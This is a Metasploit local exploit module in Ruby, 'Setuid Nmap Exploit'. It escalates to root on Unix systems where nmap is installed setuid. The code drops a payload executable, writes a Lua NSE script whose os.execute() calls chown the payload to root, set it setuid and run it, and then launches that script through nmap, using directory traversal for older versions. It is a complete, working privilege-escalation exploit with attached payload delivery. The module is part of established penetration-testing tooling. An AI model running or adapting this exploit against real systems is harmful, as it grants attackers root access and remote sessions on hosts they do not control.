1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Post::File
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Setuid Nmap Exploit',
17
        'Description' => %q{
18
          Nmap's man page mentions that "Nmap should never be installed with
19
          special privileges (e.g. suid root) for security reasons.." and
20
          specifically avoids making any of its binaries setuid during
21
          installation.  Nevertheless, administrators sometimes feel the need
22
          to do insecure things.  This module abuses a setuid nmap binary by
23
          writing out a lua nse script containing a call to os.execute().
24

25
          Note that modern interpreters will refuse to run scripts on the
26
          command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}
27
          payloads will most likely not work.
28
        },
29
        'License' => MSF_LICENSE,
30
        'Author' => [ 'egypt' ],
31
        'DisclosureDate' => '2012-07-19',
32
        'Platform' => %w[bsd linux unix],
33
        'SessionTypes' => [ 'shell', 'meterpreter' ],
34
        'Targets' => [
35
          [ 'Command payload', { 'Arch' => ARCH_CMD } ],
36
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
37
          [ 'BSD x86', { 'Arch' => ARCH_X86 } ],
38
        ],
39
        'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
40
        'Notes' => {
41
          'Reliability' => [ REPEATABLE_SESSION ],
42
          'Stability' => [ CRASH_SAFE ],
43
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
44
        },
45
        'DefaultTarget' => 0
46
      )
47
    )
48
    register_options([
49
      # These are not OptPath becuase it's a *remote* path
50
      OptString.new('Nmap', [ true, 'Path to setuid nmap executable', '/usr/bin/nmap' ]),
51
      OptString.new('ExtraArgs', [ false, 'Extra arguments to pass to Nmap (e.g. --datadir)', '' ]),
52
    ])
53
    register_advanced_options [
54
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
55
    ]
56
  end
57

58
  def nmap
59
    datastore['Nmap']
60
  end
61

62
  def check
63
    return CheckCode::Safe("#{nmap} file not found") unless file? nmap
64
    return CheckCode::Safe("#{nmap} is not setuid") unless setuid? nmap
65

66
    CheckCode::Vulnerable("#{nmap} is setuid")
67
  end
68

69
  def exploit
70
    if (target.arch.include? ARCH_CMD)
71
      p = payload.encoded.gsub(/([$"])/) { |_m| "\\#{Regexp.last_match(1)}" }
72
      evil_lua = %{ os.execute("#{p} &") }
73
    else
74
      exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.elf"
75
      print_status("Dropping executable #{exe_file}")
76
      write_file(exe_file, generate_payload_exe)
77
      evil_lua = %{
78
        os.execute("chown root:root #{exe_file}");
79
        os.execute("chmod 6700 #{exe_file}");
80
        os.execute("#{exe_file} &");
81
        os.execute("rm -f #{exe_file}");
82
      }
83
    end
84
    lua_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}.nse"
85
    print_status("Dropping lua #{lua_file}")
86
    write_file(lua_file, evil_lua)
87

88
    print_status("Running #{lua_file} with Nmap")
89

90
    scriptname = lua_file
91
    if (lua_file[0, 1] == '/')
92
      # Versions before 4.51BETA (December 2007) only accept relative paths for script names
93
      # Figure 10 up-directory traversals is enough.
94
      scriptname = ('../' * 10) + lua_file[1..]
95
    end
96

97
    begin
98
      # Versions before 4.75 (August 2008) will not run scripts without a port scan
99
      result = cmd_exec "#{nmap} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
100
      vprint_status(result)
101
    ensure
102
      rm_f(lua_file, exe_file)
103
    end
104
  end
105
end
106

107